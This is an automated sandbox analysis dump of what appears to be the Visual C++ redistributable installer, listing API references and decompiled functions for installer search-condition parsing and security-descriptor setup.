                                                                          0x0001adaa
                                                                          0x0001adaa
                                                                          0x00000000
                                                                          0x0001adaa
                                                                          0x0001ada4
                                                                          0x0001ad75
                                                                          0x0001ad77
                                                                          0x00000000
                                                                          0x0001ad7d
                                                                          0x0001ad7d
                                                                          0x0001adb1
                                                                          0x0001adb6
                                                                          0x0001af92
                                                                          0x0001af97
                                                                          0x0001af99
                                                                          0x00000000
                                                                          0x0001adbc
                                                                          0x0001adcd
                                                                          0x0001add1
                                                                          0x00000000
                                                                          0x0001add7
                                                                          0x0001ade3
                                                                          0x0001aded
                                                                          0x00000000
                                                                          0x0001adf3
                                                                          0x0001ae02
                                                                          0x0001ae06
                                                                          0x0001ae09
                                                                          0x00000000
                                                                          0x0001ae0f
                                                                          0x0001ae23
                                                                          0x00000000
                                                                          0x0001ae29
                                                                          0x0001ae3d
                                                                          0x00000000
                                                                          0x0001ae43
                                                                          0x0001ae43
                                                                          0x00000000
                                                                          0x0001ae43
                                                                          0x0001ae3d
                                                                          0x0001ae23
                                                                          0x0001ae09
                                                                          0x0001aded
                                                                          0x0001add1
                                                                          0x0001adb6
                                                                          0x0001ad77
                                                                          0x0001ad73
                                                                          0x0001ac77
                                                                          0x0001ac7a
                                                                          0x0001ac8f
                                                                          0x0001ac97
                                                                          0x0001acb2
                                                                          0x0001acb6
                                                                          0x0001af84
                                                                          0x00000000
                                                                          0x0001acbc
                                                                          0x0001accd
                                                                          0x0001acd1
                                                                          0x00000000
                                                                          0x0001acd7
                                                                          0x0001ace3
                                                                          0x0001aced
                                                                          0x00000000
                                                                          0x0001acf3
                                                                          0x0001ad02
                                                                          0x0001ad06
                                                                          0x0001ad09
                                                                          0x00000000
                                                                          0x0001ad0f
                                                                          0x0001ad0f
                                                                          0x0001ad11
                                                                          0x00000000
                                                                          0x0001ad11
                                                                          0x0001ad09
                                                                          0x0001aced
                                                                          0x0001acd1
                                                                          0x0001afbc
                                                                          0x0001afbc
                                                                          0x0001afbc
                                                                          0x00000000
                                                                          0x0001afbc
                                                                          0x0001ac97
                                                                          0x0001aa5c
                                                                          0x0001aa5f
                                                                          0x0001aa74
                                                                          0x0001aa78
                                                                          0x0001af7d
                                                                          0x00000000
                                                                          0x0001aa7e
                                                                          0x0001aa94
                                                                          0x0001aab3
                                                                          0x0001aad2
                                                                          0x0001aaf1
                                                                          0x0001af73
                                                                          0x0001af76
                                                                          0x00000000
                                                                          0x0001aaf7
                                                                          0x0001aaf7
                                                                          0x00000000
                                                                          0x0001aaf7
                                                                          0x0001aad4
                                                                          0x0001aad4
                                                                          0x00000000
                                                                          0x0001aad4
                                                                          0x0001aab5
                                                                          0x0001aab5
                                                                          0x00000000
                                                                          0x0001aab5
                                                                          0x0001aa96
                                                                          0x0001aa96
                                                                          0x0001aafe
                                                                          0x0001ab0f
                                                                          0x0001ab13
                                                                          0x0001af6c
                                                                          0x00000000
                                                                          0x0001ab19
                                                                          0x0001ab2a
                                                                          0x0001ab32
                                                                          0x0001ab4d
                                                                          0x0001ab51
                                                                          0x00000000
                                                                          0x0001ab57
                                                                          0x0001ab68
                                                                          0x0001ab70
                                                                          0x0001ab86
                                                                          0x0001ab90
                                                                          0x00000000
                                                                          0x0001ab96
                                                                          0x0001aba5
                                                                          0x0001aba9
                                                                          0x0001abac
                                                                          0x00000000
                                                                          0x0001abb2
                                                                          0x0001abb5
                                                                          0x0001abc6
                                                                          0x0001abce
                                                                          0x0001abe9
                                                                          0x0001abed
                                                                          0x0001af62
                                                                          0x00000000
                                                                          0x0001abf3
                                                                          0x0001abff
                                                                          0x0001ac09
                                                                          0x0001ac26
                                                                          0x0001ac2a
                                                                          0x0001ac2d
                                                                          0x0001ac4b
                                                                          0x0001af58
                                                                          0x0001af5b
                                                                          0x00000000
                                                                          0x0001ac51
                                                                          0x0001ac51
                                                                          0x00000000
                                                                          0x0001ac51
                                                                          0x0001ac2f
                                                                          0x0001ac2f
                                                                          0x00000000
                                                                          0x0001ac2f
                                                                          0x0001ac0b
                                                                          0x0001ac0b
                                                                          0x00000000
                                                                          0x0001ac0b
                                                                          0x0001ac09
                                                                          0x0001af4e
                                                                          0x0001af4e
                                                                          0x00000000
                                                                          0x0001af4e
                                                                          0x0001abce
                                                                          0x0001abac
                                                                          0x0001af44
                                                                          0x0001af44
                                                                          0x00000000
                                                                          0x0001af44
                                                                          0x0001ab70
                                                                          0x0001af3a
                                                                          0x0001af3a
                                                                          0x00000000
                                                                          0x0001af3a
                                                                          0x0001ab32
                                                                          0x0001ab13
                                                                          0x0001aa94
                                                                          0x0001aa78
                                                                          0x0001a9c5
                                                                          0x0001a9c8
                                                                          0x0001a9d9
                                                                          0x0001a9dd
                                                                          0x00000000
                                                                          0x0001a9e3
                                                                          0x0001a9f4
                                                                          0x0001a9f8
                                                                          0x00000000
                                                                          0x0001a9fe
                                                                          0x0001aa0a
                                                                          0x0001aa14
                                                                          0x00000000
                                                                          0x0001aa1a
                                                                          0x0001aa29
                                                                          0x0001aa2d
                                                                          0x0001aa30
                                                                          0x00000000
                                                                          0x0001aa36
                                                                          0x0001aa36
                                                                          0x0001aa38
                                                                          0x0001ad16
                                                                          0x0001ad23
                                                                          0x00000000
                                                                          0x0001ad29
                                                                          0x0001ad29
                                                                          0x0001ad29
                                                                          0x00000000
                                                                          0x0001ad29
                                                                          0x0001ad23
                                                                          0x0001aa30
                                                                          0x0001aa14
                                                                          0x0001a9f8
                                                                          0x0001a9dd
                                                                          0x0001a92e
                                                                          0x0001a931
                                                                          0x0001a946
                                                                          0x0001a94a
                                                                          0x0001af30
                                                                          0x0001af30
                                                                          0x00000000
                                                                          0x0001a950
                                                                          0x0001a961
                                                                          0x0001a965
                                                                          0x0001afae
                                                                          0x0001afae
                                                                          0x00000000
                                                                          0x0001a96b
                                                                          0x0001a977
                                                                          0x0001a97c
                                                                          0x0001a980
                                                                          0x0001a983
                                                                          0x0001aedd
                                                                          0x0001aedd
                                                                          0x00000000
                                                                          0x0001a989
                                                                          0x0001a998
                                                                          0x0001a99c
                                                                          0x0001a99f
                                                                          0x0001af9c
                                                                          0x0001af9c
                                                                          0x0001af9f
                                                                          0x0001afa4
                                                                          0x0001afa9
                                                                          0x0001afab
                                                                          0x0001afd1
                                                                          0x0001afd1
                                                                          0x0001a9a5
                                                                          0x0001a9a5
                                                                          0x0001a9a5
                                                                          0x0001aee4
                                                                          0x0001aee4
                                                                          0x0001aee9
                                                                          0x0001aeee
                                                                          0x0001aef1
                                                                          0x0001aef1
                                                                          0x0001aef4
                                                                          0x0001aef9
                                                                          0x0001aefc
                                                                          0x0001af02
                                                                          0x0001af02
                                                                          0x0001af0b
                                                                          0x0001af0c
                                                                          0x0001af0f
                                                                          0x0001af12
                                                                          0x0001af18
                                                                          0x0001af1e
                                                                          0x00000000
                                                                          0x0001af1e
                                                                          0x0001af18
                                                                          0x0001a99f
                                                                          0x0001a983
                                                                          0x0001a965
                                                                          0x0001a94a
                                                                          0x0001af26
                                                                          0x0001af26
                                                                          0x0001afee
                                                                          0x0001afee
                                                                          0x0001afef
                                                                          0x0001afef
                                                                          0x0001aff5
                                                                          0x0001a90c
                                                                          0x0001a8ed
                                                                          0x00000000
                                                                          0x0001a8d2
                                                                          0x0001afe9
                                                                          0x00000000
                                                                          0x0001afe9
                                                                          0x0001aff6
                                                                          0x0001a869
                                                                          0x0001a869
                                                                          0x0001a876
                                                                          0x0001a87b
                                                                          0x00000000
                                                                          0x0001a87b
                                                                          0x0001a867
                                                                          0x0001a843
                                                                          0x0001a843
                                                                          0x00000000
                                                                          0x0001a843
                                                                          0x0001a81e
                                                                          0x0001a81e
                                                                          0x0001a823
                                                                          0x0001a823
                                                                          0x0001a824
                                                                          0x0001a82a
                                                                          0x0001aff8
                                                                          0x0001affd
                                                                          0x0001b002
                                                                          0x0001b002
                                                                          0x0001b005
                                                                          0x0001b00a
                                                                          0x0001b00f
                                                                          0x0001b00f
                                                                          0x0001b012
                                                                          0x0001b017
                                                                          0x0001b01a
                                                                          0x0001b01a
                                                                          0x0001b024
                                                                          0x0001b029
                                                                          0x0001b029
                                                                          0x0001b034

                                                                          APIs
                                                                          • SysFreeString.OLEAUT32(?), ref: 0001B01A
                                                                            • Part of subcall function 000138D4: GetProcessHeap.KERNEL32(?,000001C7,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138E5
                                                                            • Part of subcall function 000138D4: RtlAllocateHeap.NTDLL(00000000,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138EC
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,0005CA64,000000FF,DirectorySearch,000000FF,0005CA64,Condition,feclient.dll,0005CA64,Variable,?,0005CA64,0005CA64,?,?), ref: 0001A927
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exists,000000FF,?,Type,?,?,Path,clbcatq.dll), ref: 0001A97C
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,path,000000FF), ref: 0001A998
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,FileSearch,000000FF), ref: 0001A9BC
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exists,000000FF,?,Type,?,?,Path,clbcatq.dll), ref: 0001AA0F
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,version,000000FF), ref: 0001AA29
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,RegistrySearch,000000FF), ref: 0001AA51
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,HKCR,000000FF,?,Root,?), ref: 0001AA8F
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,HKCU,000000FF), ref: 0001AAAE
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,HKLM,000000FF), ref: 0001AACD
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exists,000000FF,?,Win64,msi.dll,?,Type,?,?,Value,version.dll,?), ref: 0001AB8B
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,value,000000FF), ref: 0001ABA5
                                                                            • Part of subcall function 000531C7: VariantInit.OLEAUT32(?), ref: 000531DD
                                                                            • Part of subcall function 000531C7: SysAllocString.OLEAUT32(?), ref: 000531F9
                                                                            • Part of subcall function 000531C7: VariantClear.OLEAUT32(?), ref: 00053280
                                                                            • Part of subcall function 000531C7: SysFreeString.OLEAUT32(00000000), ref: 0005328B
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,numeric,000000FF,?,VariableType,?,?,ExpandEnvironment,cabinet.dll), ref: 0001AC04
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,string,000000FF), ref: 0001AC26
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,version,000000FF), ref: 0001AC46
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,directory,000000FF), ref: 0001AD1E
                                                                          • SysFreeString.OLEAUT32(?), ref: 0001AEFC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: String$Compare$Free$HeapVariant$AllocAllocateClearInitProcess
                                                                          • String ID: ComponentId$Condition$DirectorySearch$DirectorySearch|FileSearch|RegistrySearch|MsiComponentSearch|MsiProductSearch|MsiFeatureSearch$ExpandEnvironment$Failed to allocate memory for search structs.$Failed to get @ComponentId.$Failed to get @Condition.$Failed to get @ExpandEnvironment.$Failed to get @FeatureId.$Failed to get @Id.$Failed to get @Path.$Failed to get @ProductCode or @UpgradeCode.$Failed to get @ProductCode.$Failed to get @Root.$Failed to get @Type.$Failed to get @UpgradeCode.$Failed to get @Variable.$Failed to get @VariableType.$Failed to get Key attribute.$Failed to get Value attribute.$Failed to get Win64 attribute.$Failed to get next node.$Failed to get search node count.$Failed to select search nodes.$FeatureId$FileSearch$HKCR$HKCU$HKLM$HKU$Invalid value for @Root: %ls$Invalid value for @Type: %ls$Invalid value for @VariableType: %ls$Key$MsiComponentSearch$MsiFeatureSearch$MsiProductSearch$Path$ProductCode$RegistrySearch$Root$Type$Unexpected element name: %ls$UpgradeCode$Value$Variable$VariableType$Win64$assignment$cabinet.dll$clbcatq.dll$comres.dll$directory$exists$feclient.dll$keyPath$language$msi.dll$numeric$path$search.cpp$state$string$value$version$version.dll$wininet.dll
                                                                          • API String ID: 2748437055-1695159631
                                                                          • Opcode ID: 49f231e1f32478c7f97cb74de2e996dc9d730d02493050c3e8c45d9eb8555b40
                                                                          • Instruction ID: a0a21438906b181069509ab9cbb4fbdc7edb538987a9352d4e74e022402f388c
                                                                          • Opcode Fuzzy Hash: 49f231e1f32478c7f97cb74de2e996dc9d730d02493050c3e8c45d9eb8555b40
                                                                          • Instruction Fuzzy Hash: D2221B71B49226BEDB208AA4CC45EEF7A659F02731F200364FD30BA1D1D7719F85D692
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000515CB Relevance: 40.6, APIs: 21, Strings: 2, Instructions: 320COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 26%
                                                                          			E000515CB(void* __edx) {
				signed int _v8;
				char* _v12;
				int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char* _v44;
				int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				int _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				char* _v108;
				int _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				void* _v140;
				int _v160;
				intOrPtr _v164;
				char _v168;
				void _v240;
				char _v312;
				char _v384;
				char _v456;
				char _v528;
				char _v532;
				int _v536;
				struct _SECURITY_DESCRIPTOR _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t65;
				signed short _t103;
				struct _SECURITY_DESCRIPTOR* _t112;
				signed short _t116;
				void* _t117;
				signed short _t119;
				signed short _t120;
				signed short _t121;
				signed short _t122;
				signed short _t123;
				signed short _t124;
				signed short _t125;
				signed short _t126;
				intOrPtr _t128;
				void* _t131;
				char _t133;
				intOrPtr* _t134;
				intOrPtr _t135;
				signed int _t167;

				_t131 = __edx;
				_t65 =  *0x7a008; // 0xfbf51acb
				_v8 = _t65 ^ _t167;
				_v556.Revision = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				asm("stosb");
				E0003F670( &(_v556.Sbz1),  &_v168, 0, 0xa0);
				_t133 = 0x48;
				_v536 = 0;
				E0003F670(_t133,  &_v240, 0, _t133);
				E0003F670(_t133,  &_v312, 0, _t133);
				E0003F670(_t133,  &_v384, 0, _t133);
				E0003F670(_t133,  &_v456, 0, _t133);
				E0003F670(_t133,  &_v528, 0, _t133);
				_v532 = 0;
				if(InitializeSecurityDescriptor( &_v556, 1) != 0) {
					_t134 = __imp__CreateWellKnownSid;
					_push( &_v532);
					_v532 = _t133;
					_push( &_v240);
					_push(0);
					_push(0x1a);
					if( *_t134() != 0) {
						_v532 = _t133;
						_push( &_v532);
						_push( &_v312);
						_push(0);
						_push(0x17);
						if( *_t134() != 0) {
							_v532 = _t133;
							_push( &_v532);
							_push( &_v384);
							_push(0);
							_push(0x18);
							if( *_t134() != 0) {
								_v532 = _t133;
								_push( &_v532);
								_push( &_v456);
								_push(0);
								_push(0x10);
								if( *_t134() != 0) {
									_v532 = _t133;
									_push( &_v532);
									_push( &_v528);
									_push(0);
									_push(0x16);
									if( *_t134() != 0) {
										asm("movaps xmm0, [0x76480]");
										_v140 =  &_v240;
										_v108 =  &_v312;
										_t128 = 3;
										_v76 =  &_v384;
										_t135 = 2;
										asm("movups [ebp-0x98], xmm0");
										_v44 =  &_v456;
										asm("movaps xmm0, [0x76480]");
										asm("movups [ebp-0x78], xmm0");
										_v12 =  &_v528;
										asm("movaps xmm0, [0x76480]");
										asm("movups [ebp-0x58], xmm0");
										_t103 =  &_v168;
										_v168 = _t128;
										asm("movaps xmm0, [0x76480]");
										asm("movups [ebp-0x38], xmm0");
										asm("movaps xmm0, [0x76480]");
										_v164 = _t135;
										_v160 = 0;
										_v136 = _t128;
										_v132 = _t135;
										_v128 = 0;
										_v104 = _t128;
										_v100 = _t135;
										_v96 = 0;
										_v72 = _t128;
										_v68 = _t135;
										_v64 = 0;
										_v40 = _t128;
										_v36 = _t135;
										_v32 = 0;
										asm("movups [ebp-0x18], xmm0");
										__imp__SetEntriesInAclA(5, _t103, 0,  &_v536);
										if(_t103 == 0) {
											if(SetSecurityDescriptorOwner( &_v556,  &_v240, 0) != 0) {
												if(SetSecurityDescriptorGroup( &_v556,  &_v240, 0) != 0) {
													if(SetSecurityDescriptorDacl( &_v556, 1, _v536, 0) != 0) {
														_t112 =  &_v556;
														__imp__CoInitializeSecurity(_t112, 0xffffffff, 0, 0, 6, _t135, 0, 0x3000, 0);
														_t136 = _t112;
													} else {
														_t116 = GetLastError();
														_t139 =  <=  ? _t116 : _t116 & 0x0000ffff | 0x80070000;
														_t117 = 0x80004005;
														_t136 =  >=  ? 0x80004005 :  <=  ? _t116 : _t116 & 0x0000ffff | 0x80070000;
														_push( >=  ? 0x80004005 :  <=  ? _t116 : _t116 & 0x0000ffff | 0x80070000);
														_push(0xdf);
														goto L2;
													}
												} else {
													_t119 = GetLastError();
													_t142 =  <=  ? _t119 : _t119 & 0x0000ffff | 0x80070000;
													_t117 = 0x80004005;
													_t136 =  >=  ? 0x80004005 :  <=  ? _t119 : _t119 & 0x0000ffff | 0x80070000;
													_push( >=  ? 0x80004005 :  <=  ? _t119 : _t119 & 0x0000ffff | 0x80070000);
													_push(0xd9);
													goto L2;
												}
											} else {
												_t120 = GetLastError();
												_t145 =  <=  ? _t120 : _t120 & 0x0000ffff | 0x80070000;
												_t117 = 0x80004005;
												_t136 =  >=  ? 0x80004005 :  <=  ? _t120 : _t120 & 0x0000ffff | 0x80070000;
												_push( >=  ? 0x80004005 :  <=  ? _t120 : _t120 & 0x0000ffff | 0x80070000);
												_push(0xd3);
												goto L2;
											}
										} else {
											_t148 =  <=  ? _t103 : _t103 & 0x0000ffff | 0x80070000;
											_t117 = 0x80004005;
											_t136 =  >=  ? 0x80004005 :  <=  ? _t103 : _t103 & 0x0000ffff | 0x80070000;
											_push( >=  ? 0x80004005 :  <=  ? _t103 : _t103 & 0x0000ffff | 0x80070000);
											_push(0xce);
											goto L2;
										}
									} else {
										_t121 = GetLastError();
										_t151 =  <=  ? _t121 : _t121 & 0x0000ffff | 0x80070000;
										_t117 = 0x80004005;
										_t136 =  >=  ? 0x80004005 :  <=  ? _t121 : _t121 & 0x0000ffff | 0x80070000;
										_push( >=  ? 0x80004005 :  <=  ? _t121 : _t121 & 0x0000ffff | 0x80070000);
										_push(0x9a);
										goto L2;
									}
								} else {
									_t122 = GetLastError();
									_t154 =  <=  ? _t122 : _t122 & 0x0000ffff | 0x80070000;
									_t117 = 0x80004005;
									_t136 =  >=  ? 0x80004005 :  <=  ? _t122 : _t122 & 0x0000ffff | 0x80070000;
									_push( >=  ? 0x80004005 :  <=  ? _t122 : _t122 & 0x0000ffff | 0x80070000);
									_push(0x93);
									goto L2;
								}
							} else {
								_t123 = GetLastError();
								_t157 =  <=  ? _t123 : _t123 & 0x0000ffff | 0x80070000;
								_t117 = 0x80004005;
								_t136 =  >=  ? 0x80004005 :  <=  ? _t123 : _t123 & 0x0000ffff | 0x80070000;
								_push( >=  ? 0x80004005 :  <=  ? _t123 : _t123 & 0x0000ffff | 0x80070000);
								_push(0x8c);
								goto L2;
							}
						} else {
							_t124 = GetLastError();
							_t160 =  <=  ? _t124 : _t124 & 0x0000ffff | 0x80070000;
							_t117 = 0x80004005;
							_t136 =  >=  ? 0x80004005 :  <=  ? _t124 : _t124 & 0x0000ffff | 0x80070000;
							_push( >=  ? 0x80004005 :  <=  ? _t124 : _t124 & 0x0000ffff | 0x80070000);
							_push(0x85);
							goto L2;
						}
					} else {
						_t125 = GetLastError();
						_t163 =  <=  ? _t125 : _t125 & 0x0000ffff | 0x80070000;
						_t117 = 0x80004005;
						_t136 =  >=  ? 0x80004005 :  <=  ? _t125 : _t125 & 0x0000ffff | 0x80070000;
						_push( >=  ? 0x80004005 :  <=  ? _t125 : _t125 & 0x0000ffff | 0x80070000);
						_push(0x7e);
						goto L2;
					}
				} else {
					_t126 = GetLastError();
					_t166 =  <=  ? _t126 : _t126 & 0x0000ffff | 0x80070000;
					_t117 = 0x80004005;
					_t136 =  >=  ? 0x80004005 :  <=  ? _t126 : _t126 & 0x0000ffff | 0x80070000;
					_push( >=  ? 0x80004005 :  <=  ? _t126 : _t126 & 0x0000ffff | 0x80070000);
					_push(0x77);
					L2:
					_push("srputil.cpp");
					E000137D3(_t117);
				}
				if(_v536 != 0) {
					LocalFree(_v536);
				}
				return E0003DE36(0, _v8 ^ _t167, _t131, _t133, _t136);
			}























































                                                                          0x000515cb
                                                                          0x000515d4
                                                                          0x000515db
                                                                          0x000515eb
                                                                          0x000515f1
                                                                          0x000515f8
                                                                          0x000515f9
                                                                          0x000515fa
                                                                          0x000515fb
                                                                          0x000515fd
                                                                          0x00051605
                                                                          0x0005160c
                                                                          0x00051614
                                                                          0x0005161c
                                                                          0x0005162a
                                                                          0x00051638
                                                                          0x00051646
                                                                          0x00051654
                                                                          0x0005165c
                                                                          0x00051673
                                                                          0x000516a5
                                                                          0x000516b1
                                                                          0x000516b8
                                                                          0x000516be
                                                                          0x000516bf
                                                                          0x000516c0
                                                                          0x000516c6
                                                                          0x000516f1
                                                                          0x000516f7
                                                                          0x000516fe
                                                                          0x000516ff
                                                                          0x00051700
                                                                          0x00051706
                                                                          0x00051737
                                                                          0x0005173d
                                                                          0x00051744
                                                                          0x00051745
                                                                          0x00051746
                                                                          0x0005174c
                                                                          0x0005177d
                                                                          0x00051783
                                                                          0x0005178a
                                                                          0x0005178b
                                                                          0x0005178c
                                                                          0x00051792
                                                                          0x000517c3
                                                                          0x000517c9
                                                                          0x000517d0
                                                                          0x000517d1
                                                                          0x000517d2
                                                                          0x000517d8
                                                                          0x00051803
                                                                          0x00051810
                                                                          0x0005181c
                                                                          0x00051827
                                                                          0x00051828
                                                                          0x00051833
                                                                          0x00051834
                                                                          0x0005183b
                                                                          0x00051844
                                                                          0x0005184b
                                                                          0x0005184f
                                                                          0x00051858
                                                                          0x00051860
                                                                          0x00051864
                                                                          0x0005186a
                                                                          0x00051870
                                                                          0x00051878
                                                                          0x0005187d
                                                                          0x00051886
                                                                          0x0005188c
                                                                          0x00051892
                                                                          0x00051898
                                                                          0x0005189b
                                                                          0x0005189e
                                                                          0x000518a1
                                                                          0x000518a4
                                                                          0x000518a7
                                                                          0x000518aa
                                                                          0x000518ad
                                                                          0x000518b0
                                                                          0x000518b3
                                                                          0x000518b6
                                                                          0x000518b9
                                                                          0x000518bd
                                                                          0x000518c5
                                                                          0x00051901
                                                                          0x00051943
                                                                          0x00051986
                                                                          0x000519bf
                                                                          0x000519c6
                                                                          0x000519cc
                                                                          0x00051988
                                                                          0x00051988
                                                                          0x00051999
                                                                          0x0005199c
                                                                          0x000519a3
                                                                          0x000519a6
                                                                          0x000519a7
                                                                          0x00000000
                                                                          0x000519a7
                                                                          0x00051945
                                                                          0x00051945
                                                                          0x00051956
                                                                          0x00051959
                                                                          0x00051960
                                                                          0x00051963
                                                                          0x00051964
                                                                          0x00000000
                                                                          0x00051964
                                                                          0x00051903
                                                                          0x00051903
                                                                          0x00051914
                                                                          0x00051917
                                                                          0x0005191e
                                                                          0x00051921
                                                                          0x00051922
                                                                          0x00000000
                                                                          0x00051922
                                                                          0x000518c7
                                                                          0x000518d2
                                                                          0x000518d5
                                                                          0x000518dc
                                                                          0x000518df
                                                                          0x000518e0
                                                                          0x00000000
                                                                          0x000518e0
                                                                          0x000517da
                                                                          0x000517da
                                                                          0x000517eb
                                                                          0x000517ee
                                                                          0x000517f5
                                                                          0x000517f8
                                                                          0x000517f9
                                                                          0x00000000
                                                                          0x000517f9
                                                                          0x00051794
                                                                          0x00051794
                                                                          0x000517a5
                                                                          0x000517a8
                                                                          0x000517af
                                                                          0x000517b2
                                                                          0x000517b3
                                                                          0x00000000
                                                                          0x000517b3
                                                                          0x0005174e
                                                                          0x0005174e
                                                                          0x0005175f
                                                                          0x00051762
                                                                          0x00051769
                                                                          0x0005176c
                                                                          0x0005176d
                                                                          0x00000000
                                                                          0x0005176d
                                                                          0x00051708
                                                                          0x00051708
                                                                          0x00051719
                                                                          0x0005171c
                                                                          0x00051723
                                                                          0x00051726
                                                                          0x00051727
                                                                          0x00000000
                                                                          0x00051727
                                                                          0x000516c8
                                                                          0x000516c8
                                                                          0x000516d9
                                                                          0x000516dc
                                                                          0x000516e3
                                                                          0x000516e6
                                                                          0x000516e7
                                                                          0x00000000
                                                                          0x000516e7
                                                                          0x00051675
                                                                          0x00051675
                                                                          0x00051686
                                                                          0x00051689
                                                                          0x00051690
                                                                          0x00051693
                                                                          0x00051694
                                                                          0x00051696
                                                                          0x00051696
                                                                          0x0005169b
                                                                          0x0005169b
                                                                          0x000519d4
                                                                          0x000519dc
                                                                          0x000519dc
                                                                          0x000519f4

                                                                          APIs
                                                                          • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 0005166B
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00051675
                                                                          • CreateWellKnownSid.ADVAPI32(0000001A,00000000,?,?), ref: 000516C2
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000516C8
                                                                          • CreateWellKnownSid.ADVAPI32(00000017,00000000,?,?), ref: 00051702
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00051708
                                                                          • CreateWellKnownSid.ADVAPI32(00000018,00000000,?,?), ref: 00051748
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0005174E
                                                                          • CreateWellKnownSid.ADVAPI32(00000010,00000000,?,?), ref: 0005178E
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00051794
                                                                          • CreateWellKnownSid.ADVAPI32(00000016,00000000,?,?), ref: 000517D4
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000517DA
                                                                          • SetEntriesInAclA.ADVAPI32(00000005,?,00000000,?), ref: 000518BD
                                                                          • LocalFree.KERNEL32(?), ref: 000519DC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$CreateKnownWell$DescriptorEntriesFreeInitializeLocalSecurity
                                                                          • String ID: @Met$srputil.cpp
                                                                          • API String ID: 3627156773-33753889
                                                                          • Opcode ID: b1960bc6278ab79b6445f6ff75c1b3ed3e2935939acd7e60c58515ca0ca6af52
                                                                          • Instruction ID: 60265e5ca0ad9ced3fe6a619e391f466c0d7c0412cce8cf1005ee4e511b35d44
                                                                          • Opcode Fuzzy Hash: b1960bc6278ab79b6445f6ff75c1b3ed3e2935939acd7e60c58515ca0ca6af52
                                                                          • Instruction Fuzzy Hash: 32B15872D4072DABFB209BA58D44BEBB6FCEF08741F014166ED09F7150E7749D848AA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0003C0FA Relevance: 37.1, APIs: 1, Strings: 20, Instructions: 364COMMONCrypto
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 82%
                                                                          			E0003C0FA(void* __ebx, void* __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr* _a56, intOrPtr* _a60, intOrPtr* _a64, intOrPtr* _a68, intOrPtr* _a72, intOrPtr _a76) {
				void* _v8;
				intOrPtr _t83;
				intOrPtr* _t85;
				intOrPtr _t88;
				intOrPtr* _t90;
				intOrPtr* _t94;
				intOrPtr* _t99;
				intOrPtr* _t100;
				intOrPtr _t105;
				intOrPtr _t106;
				intOrPtr* _t108;
				intOrPtr* _t111;
				intOrPtr* _t113;
